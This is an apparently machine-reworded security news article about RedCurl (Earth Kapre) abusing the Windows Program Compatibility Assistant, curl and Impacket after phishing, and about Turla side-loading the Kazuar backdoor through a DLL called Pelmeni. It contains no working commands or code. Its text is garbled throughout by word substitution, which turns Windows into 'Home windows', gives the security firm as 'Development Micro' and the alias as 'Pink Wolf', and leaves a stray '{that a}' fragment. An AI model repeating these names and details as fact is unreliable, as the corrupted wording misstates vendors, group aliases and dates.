The Russian-speaking cybercrime group known as RedCurl is leveraging a authentic Microsoft Home windows element known as the Program Compatibility Assistant (PCA) to execute malicious instructions.

“The Program Compatibility Assistant Service (pcalua.exe) is a Home windows service designed to establish and deal with compatibility points with older packages,” Development Micro mentioned in an evaluation revealed this month.

“Adversaries can exploit this utility to allow command execution and bypass safety restrictions by utilizing it in its place command-line interpreter. On this investigation, the risk actor makes use of this software to obscure their actions.”

RedCurl, which can be known as Earth Kapre and Pink Wolf, is thought to be energetic since not less than 2018, orchestrating company cyber espionage assaults towards entities situated in Australia, Canada, Germany, Russia, Slovenia, the U.Okay., Ukraine, and the U.S.

In July 2023, F.A.C.C.T. revealed {that a} main Russian financial institution and an Australian firm have been focused by the risk actor in November 2022 and Could 2023 to pilfer confidential company secrets and techniques and worker info.

The assault chain examined by Development Micro entails using phishing emails containing malicious attachments (.ISO and .IMG information) to activate a multi-stage course of that begins with using cmd.exe to obtain a authentic utility known as curl from a distant server, which then acts as a channel to ship a loader (ms.dll or ps.dll).

The malicious DLL file, in flip, leverages PCA to spawn a downloader course of that takes care of building a reference to the identical area utilized by curl to fetch the loader.

Additionally used within the assault is using the Impacket open-source software program for unauthorized command execution.

The connections to Earth Kapre stem from overlaps within the command-and-control (C2) infrastructure in addition to similarities with recognized downloader artifacts utilized by the group.

“This case underscores the continuing and energetic risk posed by Earth Kapre, a risk actor that targets a various vary of industries throughout a number of international locations,” Development Micro mentioned.

“The actor employs subtle techniques, similar to abusing PowerShell, curl, and Program Compatibility Assistant (pcalua.exe) to execute malicious instructions, showcasing its dedication to evading detection inside focused networks.”

The event comes because the Russian nation-state group often called Turla (aka Iron Hunter, Pensive Ursa, Secret Blizzard, Snake, Uroburos, Venomous Bear, and Waterbug) has begun using a brand new wrapper DLL codenamed Pelmeni to deploy the .NET-based Kazuar backdoor.

Pelmeni – which masquerades as libraries associated to SkyTel, NVIDIA GeForce Expertise, vncutil, or ASUS – is loaded via DLL side-loading. As soon as this spoofed DLL is known as by the authentic software program put in on the machine, it decrypts and launches Kazuar, Lab52 mentioned.